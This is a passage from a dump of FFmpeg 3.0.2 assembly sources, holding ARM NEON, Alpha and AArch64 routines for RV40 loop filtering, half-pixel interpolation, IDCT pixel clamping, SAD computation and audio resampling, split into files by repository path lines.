function ff_rv40_v_loop_filter_strength_neon, export=1
sub r0, r0, #3
pkhbt r2, r3, r2, lsl #18
vld1.8 {d0}, [r0], r1
vld1.8 {d1}, [r0], r1
vld1.8 {d2}, [r0], r1
vld1.8 {d3}, [r0], r1
vaddl.u8 q0, d0, d1
vaddl.u8 q1, d2, d3
vdup.32 q15, r2
vadd.u16 q0, q0, q1 @ -3, -2, -1, 0, 1, 2
vext.16 q1, q0, q0, #1 @ -2, -1, 0, 1, 2
vabd.u16 q0, q1, q0
vclt.u16 q0, q0, q15
ldrd r2, r3, [sp, #4]
vmovl.u16 q1, d0
vext.16 d1, d0, d1, #3
vshr.u32 q1, q1, #15
ldr r0, [sp]
vst1.32 {d2[1]}, [r2,:32]
vst1.32 {d3[1]}, [r3,:32]
cmp r0, #0
it eq
bxeq lr
vand d0, d0, d1
vtrn.16 d0, d1
vand d0, d0, d1
vmov.u16 r0, d0[0]
bx lr
endfunc
.macro rv40_weak_loop_filter
vdup.16 d30, r2 @ filter_p1
vdup.16 d31, r3 @ filter_q1
ldrd r2, r3, [sp]
vdup.16 d28, r2 @ alpha
vdup.16 d29, r3 @ beta
ldr r12, [sp, #8]
vdup.16 d25, r12 @ lim_p0q0
ldrd r2, r3, [sp, #12]
vsubl.u8 q9, d5, d4 @ x, t
vabdl.u8 q8, d5, d4 @ x, abs(t)
vneg.s16 q15, q15
vceq.i16 d16, d19, #0 @ !t
vshl.s16 d19, d19, #2 @ t << 2
vmul.u16 d18, d17, d28 @ alpha * abs(t)
vand d24, d30, d31 @ filter_p1 & filter_q1
vsubl.u8 q1, d0, d4 @ p1p2, p1p0
vsubl.u8 q3, d1, d5 @ q1q2, q1q0
vmov.i16 d22, #3
vshr.u16 d18, d18, #7
vadd.i16 d22, d22, d24 @ 3 - (filter_p1 & filter_q1)
vsubl.u8 q10, d0, d1 @ src[-2] - src[1]
vcle.u16 d18, d18, d22
vand d20, d20, d24
vneg.s16 d23, d25 @ -lim_p0q0
vadd.s16 d19, d19, d20
vbic d16, d18, d16 @ t && u <= 3 - (fp1 & fq1)
vtrn.32 d4, d5 @ -3, 2, -1, 0
vrshr.s16 d19, d19, #3
vmov d28, d29 @ beta
vswp d3, d6 @ q1q2, p1p0
vmin.s16 d19, d19, d25
vand d30, d30, d16
vand d31, d31, d16
vadd.s16 q10, q1, q3 @ p1p2 + p1p0, q1q2 + q1q0
vmax.s16 d19, d19, d23 @ diff
vabs.s16 q1, q1 @ abs(p1p2), abs(q1q2)
vand d18, d19, d16 @ diff
vcle.u16 q1, q1, q14
vneg.s16 d19, d18 @ -diff
vdup.16 d26, r3 @ lim_p1
vaddw.u8 q2, q9, d5 @ src[-1]+diff, src[0]-diff
vhsub.s16 q11, q10, q9
vand q1, q1, q15
vqmovun.s16 d4, q2 @ -1, 0
vand q9, q11, q1
vdup.16 d27, r2 @ lim_q1
vneg.s16 q9, q9
vneg.s16 q14, q13
vmin.s16 q9, q9, q13
vtrn.32 d0, d1 @ -2, 1, -2, 1
vmax.s16 q9, q9, q14
vaddw.u8 q3, q9, d0
vqmovun.s16 d5, q3 @ -2, 1
.endm
function ff_rv40_h_weak_loop_filter_neon, export=1
sub r0, r0, r1, lsl #1
sub r0, r0, r1
vld1.32 {d4[]}, [r0,:32], r1
vld1.32 {d0[]}, [r0,:32], r1
vld1.32 {d4[1]}, [r0,:32], r1
vld1.32 {d5[]}, [r0,:32], r1
vld1.32 {d1[]}, [r0,:32], r1
vld1.32 {d5[0]}, [r0,:32]
sub r0, r0, r1, lsl #2
rv40_weak_loop_filter
vst1.32 {d5[0]}, [r0,:32], r1
vst1.32 {d4[0]}, [r0,:32], r1
vst1.32 {d4[1]}, [r0,:32], r1
vst1.32 {d5[1]}, [r0,:32], r1
bx lr
endfunc
function ff_rv40_v_weak_loop_filter_neon, export=1
sub r12, r0, #3
sub r0, r0, #2
vld1.8 {d4}, [r12], r1
vld1.8 {d5}, [r12], r1
vld1.8 {d2}, [r12], r1
vld1.8 {d3}, [r12], r1
vtrn.16 q2, q1
vtrn.8 d4, d5
vtrn.8 d2, d3
vrev64.32 d5, d5
vtrn.32 q2, q1
vdup.32 d0, d3[0]
vdup.32 d1, d2[0]
rv40_weak_loop_filter
vtrn.32 q2, q3
vswp d4, d5
vst4.8 {d4[0],d5[0],d6[0],d7[0]}, [r0], r1
vst4.8 {d4[1],d5[1],d6[1],d7[1]}, [r0], r1
vst4.8 {d4[2],d5[2],d6[2],d7[2]}, [r0], r1
vst4.8 {d4[3],d5[3],d6[3],d7[3]}, [r0], r1
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 13,431
|
ffmpeg-3.0.2/libavcodec/arm/hpeldsp_neon.S
|
/*
* ARM NEON optimised DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro pixels16 rnd=1, avg=0
.if \avg
mov r12, r0
.endif
1: vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
vld1.8 {q2}, [r1], r2
pld [r1, r2, lsl #2]
vld1.8 {q3}, [r1], r2
pld [r1]
pld [r1, r2]
pld [r1, r2, lsl #1]
.if \avg
vld1.8 {q8}, [r12,:128], r2
vrhadd.u8 q0, q0, q8
vld1.8 {q9}, [r12,:128], r2
vrhadd.u8 q1, q1, q9
vld1.8 {q10}, [r12,:128], r2
vrhadd.u8 q2, q2, q10
vld1.8 {q11}, [r12,:128], r2
vrhadd.u8 q3, q3, q11
.endif
subs r3, r3, #4
vst1.64 {q0}, [r0,:128], r2
vst1.64 {q1}, [r0,:128], r2
vst1.64 {q2}, [r0,:128], r2
vst1.64 {q3}, [r0,:128], r2
bne 1b
bx lr
.endm
.macro pixels16_x2 rnd=1, avg=0
1: vld1.8 {d0-d2}, [r1], r2
vld1.8 {d4-d6}, [r1], r2
pld [r1]
pld [r1, r2]
subs r3, r3, #2
vext.8 q1, q0, q1, #1
avg q0, q0, q1
vext.8 q3, q2, q3, #1
avg q2, q2, q3
.if \avg
vld1.8 {q1}, [r0,:128], r2
vld1.8 {q3}, [r0,:128]
vrhadd.u8 q0, q0, q1
vrhadd.u8 q2, q2, q3
sub r0, r0, r2
.endif
vst1.8 {q0}, [r0,:128], r2
vst1.8 {q2}, [r0,:128], r2
bne 1b
bx lr
.endm
.macro pixels16_y2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
1: subs r3, r3, #2
avg q2, q0, q1
vld1.8 {q0}, [r1], r2
avg q3, q0, q1
vld1.8 {q1}, [r1], r2
pld [r1]
pld [r1, r2]
.if \avg
vld1.8 {q8}, [r0,:128], r2
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q2, q2, q8
vrhadd.u8 q3, q3, q9
sub r0, r0, r2
.endif
vst1.8 {q2}, [r0,:128], r2
vst1.8 {q3}, [r0,:128], r2
bne 1b
avg q2, q0, q1
vld1.8 {q0}, [r1], r2
avg q3, q0, q1
.if \avg
vld1.8 {q8}, [r0,:128], r2
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q2, q2, q8
vrhadd.u8 q3, q3, q9
sub r0, r0, r2
.endif
vst1.8 {q2}, [r0,:128], r2
vst1.8 {q3}, [r0,:128], r2
bx lr
.endm
.macro pixels16_xy2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {d0-d2}, [r1], r2
vld1.8 {d4-d6}, [r1], r2
NRND vmov.i16 q13, #1
pld [r1]
pld [r1, r2]
vext.8 q1, q0, q1, #1
vext.8 q3, q2, q3, #1
vaddl.u8 q8, d0, d2
vaddl.u8 q10, d1, d3
vaddl.u8 q9, d4, d6
vaddl.u8 q11, d5, d7
1: subs r3, r3, #2
vld1.8 {d0-d2}, [r1], r2
vadd.u16 q12, q8, q9
pld [r1]
NRND vadd.u16 q12, q12, q13
vext.8 q15, q0, q1, #1
vadd.u16 q1 , q10, q11
shrn d28, q12, #2
NRND vadd.u16 q1, q1, q13
shrn d29, q1, #2
.if \avg
vld1.8 {q8}, [r0,:128]
vrhadd.u8 q14, q14, q8
.endif
vaddl.u8 q8, d0, d30
vld1.8 {d2-d4}, [r1], r2
vaddl.u8 q10, d1, d31
vst1.8 {q14}, [r0,:128], r2
vadd.u16 q12, q8, q9
pld [r1, r2]
NRND vadd.u16 q12, q12, q13
vext.8 q2, q1, q2, #1
vadd.u16 q0, q10, q11
shrn d30, q12, #2
NRND vadd.u16 q0, q0, q13
shrn d31, q0, #2
.if \avg
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q15, q15, q9
.endif
vaddl.u8 q9, d2, d4
vaddl.u8 q11, d3, d5
vst1.8 {q15}, [r0,:128], r2
bgt 1b
vld1.8 {d0-d2}, [r1], r2
vadd.u16 q12, q8, q9
NRND vadd.u16 q12, q12, q13
vext.8 q15, q0, q1, #1
vadd.u16 q1 , q10, q11
shrn d28, q12, #2
NRND vadd.u16 q1, q1, q13
shrn d29, q1, #2
.if \avg
vld1.8 {q8}, [r0,:128]
vrhadd.u8 q14, q14, q8
.endif
vaddl.u8 q8, d0, d30
vaddl.u8 q10, d1, d31
vst1.8 {q14}, [r0,:128], r2
vadd.u16 q12, q8, q9
NRND vadd.u16 q12, q12, q13
vadd.u16 q0, q10, q11
shrn d30, q12, #2
NRND vadd.u16 q0, q0, q13
shrn d31, q0, #2
.if \avg
vld1.8 {q9}, [r0,:128]
vrhadd.u8 q15, q15, q9
.endif
vst1.8 {q15}, [r0,:128], r2
bx lr
.endm
.macro pixels8 rnd=1, avg=0
1: vld1.8 {d0}, [r1], r2
vld1.8 {d1}, [r1], r2
vld1.8 {d2}, [r1], r2
pld [r1, r2, lsl #2]
vld1.8 {d3}, [r1], r2
pld [r1]
pld [r1, r2]
pld [r1, r2, lsl #1]
.if \avg
vld1.8 {d4}, [r0,:64], r2
vrhadd.u8 d0, d0, d4
vld1.8 {d5}, [r0,:64], r2
vrhadd.u8 d1, d1, d5
vld1.8 {d6}, [r0,:64], r2
vrhadd.u8 d2, d2, d6
vld1.8 {d7}, [r0,:64], r2
vrhadd.u8 d3, d3, d7
sub r0, r0, r2, lsl #2
.endif
subs r3, r3, #4
vst1.8 {d0}, [r0,:64], r2
vst1.8 {d1}, [r0,:64], r2
vst1.8 {d2}, [r0,:64], r2
vst1.8 {d3}, [r0,:64], r2
bne 1b
bx lr
.endm
.macro pixels8_x2 rnd=1, avg=0
1: vld1.8 {q0}, [r1], r2
vext.8 d1, d0, d1, #1
vld1.8 {q1}, [r1], r2
vext.8 d3, d2, d3, #1
pld [r1]
pld [r1, r2]
subs r3, r3, #2
vswp d1, d2
avg q0, q0, q1
.if \avg
vld1.8 {d4}, [r0,:64], r2
vld1.8 {d5}, [r0,:64]
vrhadd.u8 q0, q0, q2
sub r0, r0, r2
.endif
vst1.8 {d0}, [r0,:64], r2
vst1.8 {d1}, [r0,:64], r2
bne 1b
bx lr
.endm
.macro pixels8_y2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {d0}, [r1], r2
vld1.8 {d1}, [r1], r2
1: subs r3, r3, #2
avg d4, d0, d1
vld1.8 {d0}, [r1], r2
avg d5, d0, d1
vld1.8 {d1}, [r1], r2
pld [r1]
pld [r1, r2]
.if \avg
vld1.8 {d2}, [r0,:64], r2
vld1.8 {d3}, [r0,:64]
vrhadd.u8 q2, q2, q1
sub r0, r0, r2
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d5}, [r0,:64], r2
bne 1b
avg d4, d0, d1
vld1.8 {d0}, [r1], r2
avg d5, d0, d1
.if \avg
vld1.8 {d2}, [r0,:64], r2
vld1.8 {d3}, [r0,:64]
vrhadd.u8 q2, q2, q1
sub r0, r0, r2
.endif
vst1.8 {d4}, [r0,:64], r2
vst1.8 {d5}, [r0,:64], r2
bx lr
.endm
.macro pixels8_xy2 rnd=1, avg=0
sub r3, r3, #2
vld1.8 {q0}, [r1], r2
vld1.8 {q1}, [r1], r2
NRND vmov.i16 q11, #1
pld [r1]
pld [r1, r2]
vext.8 d4, d0, d1, #1
vext.8 d6, d2, d3, #1
vaddl.u8 q8, d0, d4
vaddl.u8 q9, d2, d6
1: subs r3, r3, #2
vld1.8 {q0}, [r1], r2
pld [r1]
vadd.u16 q10, q8, q9
vext.8 d4, d0, d1, #1
NRND vadd.u16 q10, q10, q11
vaddl.u8 q8, d0, d4
shrn d5, q10, #2
vld1.8 {q1}, [r1], r2
vadd.u16 q10, q8, q9
pld [r1, r2]
.if \avg
vld1.8 {d7}, [r0,:64]
vrhadd.u8 d5, d5, d7
.endif
NRND vadd.u16 q10, q10, q11
vst1.8 {d5}, [r0,:64], r2
shrn d7, q10, #2
.if \avg
vld1.8 {d5}, [r0,:64]
vrhadd.u8 d7, d7, d5
.endif
vext.8 d6, d2, d3, #1
vaddl.u8 q9, d2, d6
vst1.8 {d7}, [r0,:64], r2
bgt 1b
vld1.8 {q0}, [r1], r2
vadd.u16 q10, q8, q9
vext.8 d4, d0, d1, #1
NRND vadd.u16 q10, q10, q11
vaddl.u8 q8, d0, d4
shrn d5, q10, #2
vadd.u16 q10, q8, q9
.if \avg
vld1.8 {d7}, [r0,:64]
vrhadd.u8 d5, d5, d7
.endif
NRND vadd.u16 q10, q10, q11
vst1.8 {d5}, [r0,:64], r2
shrn d7, q10, #2
.if \avg
vld1.8 {d5}, [r0,:64]
vrhadd.u8 d7, d7, d5
.endif
vst1.8 {d7}, [r0,:64], r2
bx lr
.endm
.macro pixfunc pfx, name, suf, rnd=1, avg=0
.if \rnd
.macro avg rd, rn, rm
vrhadd.u8 \rd, \rn, \rm
.endm
.macro shrn rd, rn, rm
vrshrn.u16 \rd, \rn, \rm
.endm
.macro NRND insn:vararg
.endm
.else
.macro avg rd, rn, rm
vhadd.u8 \rd, \rn, \rm
.endm
.macro shrn rd, rn, rm
vshrn.u16 \rd, \rn, \rm
.endm
.macro NRND insn:vararg
\insn
.endm
.endif
function ff_\pfx\name\suf\()_neon, export=1
\name \rnd, \avg
endfunc
.purgem avg
.purgem shrn
.purgem NRND
.endm
.macro pixfunc2 pfx, name, avg=0
pixfunc \pfx, \name, rnd=1, avg=\avg
pixfunc \pfx, \name, _no_rnd, rnd=0, avg=\avg
.endm
function ff_put_h264_qpel16_mc00_neon, export=1
mov r3, #16
endfunc
pixfunc put_, pixels16, avg=0
pixfunc2 put_, pixels16_x2, avg=0
pixfunc2 put_, pixels16_y2, avg=0
pixfunc2 put_, pixels16_xy2, avg=0
function ff_avg_h264_qpel16_mc00_neon, export=1
mov r3, #16
endfunc
pixfunc avg_, pixels16, avg=1
pixfunc2 avg_, pixels16_x2, avg=1
pixfunc2 avg_, pixels16_y2, avg=1
pixfunc2 avg_, pixels16_xy2, avg=1
function ff_put_h264_qpel8_mc00_neon, export=1
mov r3, #8
endfunc
pixfunc put_, pixels8, avg=0
pixfunc2 put_, pixels8_x2, avg=0
pixfunc2 put_, pixels8_y2, avg=0
pixfunc2 put_, pixels8_xy2, avg=0
function ff_avg_h264_qpel8_mc00_neon, export=1
mov r3, #8
endfunc
pixfunc avg_, pixels8, avg=1
pixfunc avg_, pixels8_x2, avg=1
pixfunc avg_, pixels8_y2, avg=1
pixfunc avg_, pixels8_xy2, avg=1
|
Akagi201/ffmpeg-xcode
| 4,948
|
ffmpeg-3.0.2/libavcodec/alpha/idctdsp_alpha_asm.S
|
/*
* Alpha optimized IDCT-related routines
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/*
* These functions are scheduled for pca56. They should work
* reasonably on ev6, though.
*/
#include "regdef.h"
.set noat
.set noreorder
.arch pca56
.text
/************************************************************************
* void put_pixels_clamped_mvi_asm(const int16_t *block, uint8_t *pixels,
* ptrdiff_t line_size)
*/
.align 6
.globl put_pixels_clamped_mvi_asm
.ent put_pixels_clamped_mvi_asm
put_pixels_clamped_mvi_asm:
.frame sp, 0, ra
.prologue 0
lda t8, -1
lda t9, 8 # loop counter
zap t8, 0xaa, t8 # 00ff00ff00ff00ff
.align 4
1: ldq t0, 0(a0)
ldq t1, 8(a0)
ldq t2, 16(a0)
ldq t3, 24(a0)
maxsw4 t0, zero, t0
subq t9, 2, t9
maxsw4 t1, zero, t1
lda a0, 32(a0)
maxsw4 t2, zero, t2
addq a1, a2, ta
maxsw4 t3, zero, t3
minsw4 t0, t8, t0
minsw4 t1, t8, t1
minsw4 t2, t8, t2
minsw4 t3, t8, t3
pkwb t0, t0
pkwb t1, t1
pkwb t2, t2
pkwb t3, t3
stl t0, 0(a1)
stl t1, 4(a1)
addq ta, a2, a1
stl t2, 0(ta)
stl t3, 4(ta)
bne t9, 1b
ret
.end put_pixels_clamped_mvi_asm
/************************************************************************
* void add_pixels_clamped_mvi_asm(const int16_t *block, uint8_t *pixels,
* ptrdiff_t line_size)
*/
.align 6
.globl add_pixels_clamped_mvi_asm
.ent add_pixels_clamped_mvi_asm
add_pixels_clamped_mvi_asm:
.frame sp, 0, ra
.prologue 0
lda t1, -1
lda th, 8
zap t1, 0x33, tg
nop
srl tg, 1, t0
xor tg, t0, tg # 0x8000800080008000
zap t1, 0xaa, tf # 0x00ff00ff00ff00ff
.align 4
1: ldl t1, 0(a1) # pix0 (try to hit cache line soon)
ldl t4, 4(a1) # pix1
addq a1, a2, te # pixels += line_size
ldq t0, 0(a0) # shorts0
ldl t7, 0(te) # pix2 (try to hit cache line soon)
ldl ta, 4(te) # pix3
ldq t3, 8(a0) # shorts1
ldq t6, 16(a0) # shorts2
ldq t9, 24(a0) # shorts3
unpkbw t1, t1 # 0 0 (quarter/op no.)
and t0, tg, t2 # 0 1
unpkbw t4, t4 # 1 0
bic t0, tg, t0 # 0 2
unpkbw t7, t7 # 2 0
and t3, tg, t5 # 1 1
addq t0, t1, t0 # 0 3
xor t0, t2, t0 # 0 4
unpkbw ta, ta # 3 0
and t6, tg, t8 # 2 1
maxsw4 t0, zero, t0 # 0 5
bic t3, tg, t3 # 1 2
bic t6, tg, t6 # 2 2
minsw4 t0, tf, t0 # 0 6
addq t3, t4, t3 # 1 3
pkwb t0, t0 # 0 7
xor t3, t5, t3 # 1 4
maxsw4 t3, zero, t3 # 1 5
addq t6, t7, t6 # 2 3
xor t6, t8, t6 # 2 4
and t9, tg, tb # 3 1
minsw4 t3, tf, t3 # 1 6
bic t9, tg, t9 # 3 2
maxsw4 t6, zero, t6 # 2 5
addq t9, ta, t9 # 3 3
stl t0, 0(a1) # 0 8
minsw4 t6, tf, t6 # 2 6
xor t9, tb, t9 # 3 4
maxsw4 t9, zero, t9 # 3 5
lda a0, 32(a0) # block += 16;
pkwb t3, t3 # 1 7
minsw4 t9, tf, t9 # 3 6
subq th, 2, th
pkwb t6, t6 # 2 7
pkwb t9, t9 # 3 7
stl t3, 4(a1) # 1 8
addq te, a2, a1 # pixels += line_size
stl t6, 0(te) # 2 8
stl t9, 4(te) # 3 8
bne th, 1b
ret
.end add_pixels_clamped_mvi_asm
|
Akagi201/ffmpeg-xcode
| 2,996
|
ffmpeg-3.0.2/libavcodec/alpha/hpeldsp_alpha_asm.S
|
/*
* Alpha optimized DSP utils
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
/*
* These functions are scheduled for pca56. They should work
* reasonably on ev6, though.
*/
#include "regdef.h"
.set noat
.set noreorder
.arch pca56
.text
/************************************************************************
* void put_pixels_axp_asm(uint8_t *block, const uint8_t *pixels,
* int line_size, int h)
*/
.align 6
.globl put_pixels_axp_asm
.ent put_pixels_axp_asm
put_pixels_axp_asm:
.frame sp, 0, ra
.prologue 0
and a1, 7, t0
beq t0, $aligned
.align 4
$unaligned:
ldq_u t0, 0(a1)
ldq_u t1, 8(a1)
addq a1, a2, a1
nop
ldq_u t2, 0(a1)
ldq_u t3, 8(a1)
addq a1, a2, a1
nop
ldq_u t4, 0(a1)
ldq_u t5, 8(a1)
addq a1, a2, a1
nop
ldq_u t6, 0(a1)
ldq_u t7, 8(a1)
extql t0, a1, t0
addq a1, a2, a1
extqh t1, a1, t1
addq a0, a2, t8
extql t2, a1, t2
addq t8, a2, t9
extqh t3, a1, t3
addq t9, a2, ta
extql t4, a1, t4
or t0, t1, t0
extqh t5, a1, t5
or t2, t3, t2
extql t6, a1, t6
or t4, t5, t4
extqh t7, a1, t7
or t6, t7, t6
stq t0, 0(a0)
stq t2, 0(t8)
stq t4, 0(t9)
subq a3, 4, a3
stq t6, 0(ta)
addq ta, a2, a0
bne a3, $unaligned
ret
.align 4
$aligned:
ldq t0, 0(a1)
addq a1, a2, a1
ldq t1, 0(a1)
addq a1, a2, a1
ldq t2, 0(a1)
addq a1, a2, a1
ldq t3, 0(a1)
addq a0, a2, t4
addq a1, a2, a1
addq t4, a2, t5
subq a3, 4, a3
stq t0, 0(a0)
addq t5, a2, t6
stq t1, 0(t4)
addq t6, a2, a0
stq t2, 0(t5)
stq t3, 0(t6)
bne a3, $aligned
ret
.end put_pixels_axp_asm
|
Akagi201/ffmpeg-xcode
| 6,202
|
ffmpeg-3.0.2/libavcodec/alpha/me_cmp_mvi_asm.S
|
/*
* Alpha optimized DSP utils
* Copyright (c) 2002 Falk Hueffner <falk@debian.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "regdef.h"
/* Some nicer register names. */
#define ta t10
#define tb t11
#define tc t12
#define td AT
/* Danger: these overlap with the argument list and the return value */
#define te a5
#define tf a4
#define tg a3
#define th v0
.set noat
.set noreorder
.arch pca56
.text
/*****************************************************************************
* int pix_abs16x16_mvi_asm(uint8_t *pix1, uint8_t *pix2, int line_size)
*
* This code is written with a pca56 in mind. For ev6, one should
* really take the increased latency of 3 cycles for MVI instructions
* into account.
*
* It is important to keep the loading and first use of a register as
* far apart as possible, because if a register is accessed before it
* has been fetched from memory, the CPU will stall.
*/
.align 4
.globl pix_abs16x16_mvi_asm
.ent pix_abs16x16_mvi_asm
pix_abs16x16_mvi_asm:
.frame sp, 0, ra, 0
.prologue 0
and a2, 7, t0
clr v0
beq t0, $aligned
.align 4
$unaligned:
/* Registers:
line 0:
t0: left_u -> left lo -> left
t1: mid
t2: right_u -> right hi -> right
t3: ref left
t4: ref right
line 1:
t5: left_u -> left lo -> left
t6: mid
t7: right_u -> right hi -> right
t8: ref left
t9: ref right
temp:
ta: left hi
tb: right lo
tc: error left
td: error right */
/* load line 0 */
ldq_u t0, 0(a2) # left_u
ldq_u t1, 8(a2) # mid
ldq_u t2, 16(a2) # right_u
ldq t3, 0(a1) # ref left
ldq t4, 8(a1) # ref right
addq a1, a3, a1 # pix1
addq a2, a3, a2 # pix2
/* load line 1 */
ldq_u t5, 0(a2) # left_u
ldq_u t6, 8(a2) # mid
ldq_u t7, 16(a2) # right_u
ldq t8, 0(a1) # ref left
ldq t9, 8(a1) # ref right
addq a1, a3, a1 # pix1
addq a2, a3, a2 # pix2
/* calc line 0 */
extql t0, a2, t0 # left lo
extqh t1, a2, ta # left hi
extql t1, a2, tb # right lo
or t0, ta, t0 # left
extqh t2, a2, t2 # right hi
perr t3, t0, tc # error left
or t2, tb, t2 # right
perr t4, t2, td # error right
addq v0, tc, v0 # add error left
addq v0, td, v0 # add error left
/* calc line 1 */
extql t5, a2, t5 # left lo
extqh t6, a2, ta # left hi
extql t6, a2, tb # right lo
or t5, ta, t5 # left
extqh t7, a2, t7 # right hi
perr t8, t5, tc # error left
or t7, tb, t7 # right
perr t9, t7, td # error right
addq v0, tc, v0 # add error left
addq v0, td, v0 # add error left
/* loop */
subq a4, 2, a4 # h -= 2
bne a4, $unaligned
ret
.align 4
$aligned:
/* load line 0 */
ldq t0, 0(a2) # left
ldq t1, 8(a2) # right
addq a2, a3, a2 # pix2
ldq t2, 0(a1) # ref left
ldq t3, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 1 */
ldq t4, 0(a2) # left
ldq t5, 8(a2) # right
addq a2, a3, a2 # pix2
ldq t6, 0(a1) # ref left
ldq t7, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 2 */
ldq t8, 0(a2) # left
ldq t9, 8(a2) # right
addq a2, a3, a2 # pix2
ldq ta, 0(a1) # ref left
ldq tb, 8(a1) # ref right
addq a1, a3, a1 # pix1
/* load line 3 */
ldq tc, 0(a2) # left
ldq td, 8(a2) # right
addq a2, a3, a2 # pix2
ldq te, 0(a1) # ref left
ldq a0, 8(a1) # ref right
/* calc line 0 */
perr t0, t2, t0 # error left
addq a1, a3, a1 # pix1
perr t1, t3, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 1 */
perr t4, t6, t0 # error left
addq v0, t1, v0 # add error right
perr t5, t7, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 2 */
perr t8, ta, t0 # error left
addq v0, t1, v0 # add error right
perr t9, tb, t1 # error right
addq v0, t0, v0 # add error left
/* calc line 3 */
perr tc, te, t0 # error left
addq v0, t1, v0 # add error right
perr td, a0, t1 # error right
addq v0, t0, v0 # add error left
addq v0, t1, v0 # add error right
/* loop */
subq a4, 4, a4 # h -= 4
bne a4, $aligned
ret
.end pix_abs16x16_mvi_asm
|
Akagi201/ffmpeg-xcode
| 7,457
|
ffmpeg-3.0.2/libavresample/aarch64/resample_neon.S
|
/*
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/aarch64/asm.S"
#include "asm-offsets.h"
.macro resample_one fmt, es=2
.ifnc \fmt, dbl
.macro M_MUL2 x:vararg
.endm
.macro M_MLA2 x:vararg
.endm
.endif
function ff_resample_one_\fmt\()_neon, export=1
sxtw x2, w2
ldr x9, [x0, #FILTER_BANK]
ldr w6, [x0, #FILTER_LENGTH]
ldp w7, w8, [x0, #PHASE_SHIFT] // and phase_mask
lsr x10, x4, x7 // sample_index
and x4, x4, x8
lsl x11, x6, #\es // filter_length * elem_size
add x3, x3, x10, lsl #\es // src[sample_index]
madd x9, x11, x4, x9 // filter
cmp w6, #16
b.lt 5f
8: // remaining filter_length at least 16
subs w6, w6, #16
LOAD8 v4, v5, v6, v7, x3
LOAD8 v16, v17, v18, v19, x9
M_MUL v0, v4, v16, v1
M_MUL2 v1, v6, v18
7:
LOAD8 v20, v21, v22, v23, x3
M_MLA v0, v5, v17, v1
M_MLA2 v1, v7, v19
LOAD8 v24, v25, v26, v27, x9
M_MLA v0, v20, v24, v1
M_MLA2 v1, v22, v26
b.eq 6f
cmp w6, #16
M_MLA v0, v21, v25, v1
M_MLA2 v1, v23, v27
b.lt 4f
subs w6, w6, #16
LOAD8 v4, v5, v6, v7, x3
LOAD8 v16, v17, v18, v19, x9
M_MLA v0, v4, v16, v1
M_MLA2 v1, v6, v18
b 7b
6:
M_MLA v0, v21, v25, v1
M_MLA2 v1, v23, v27
STORE_ONE 0, x1, x2, v1
ret
5:
movi v0.16b, #0
movi v1.16b, #0
4: // remaining filter_length 1-15
cmp w6, #4
b.lt 2f
